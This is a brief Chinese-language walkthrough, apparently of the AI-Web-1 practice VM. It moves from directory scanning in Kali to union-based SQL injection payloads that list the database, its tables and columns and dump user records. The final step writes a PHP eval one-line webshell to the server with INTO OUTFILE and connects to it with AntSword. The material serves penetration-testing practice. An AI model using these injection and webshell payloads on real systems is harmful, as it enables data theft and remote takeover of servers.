首先第一步扫描
扫描到它底下的目录进入浏览器访问
然后进入kali虚拟机扫描目录文件
查看php文件发现绝对路径
紧接着扫另一个目录
然后进入文件地址
判断闭合方式
判断列数
紧接着查询数据库名 -1' union select 1,database(),3 #
然后再根据数据库查看表名 -1' union select 1,table_name,3 from information_schema.columns where table_schema='aiweb1' #
再根据表名查看列 -1' union select 1,column_name,3 from information_schema.columns where table_name='user' #
-1' union select 1,column_name,3 from information_schema.columns where table_name='systemUser' #
查看表中内容-1' union select id,firstName,lastName from user #
然后去那个info.php中寻找绝对路径写入一句话代码
1' union select 1,2,'<?php @eval($_POST[cmd]);?>' into outfile "/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/sxy.php" #
然后根据文件地址使用webshell连接这里用的是蚁剑。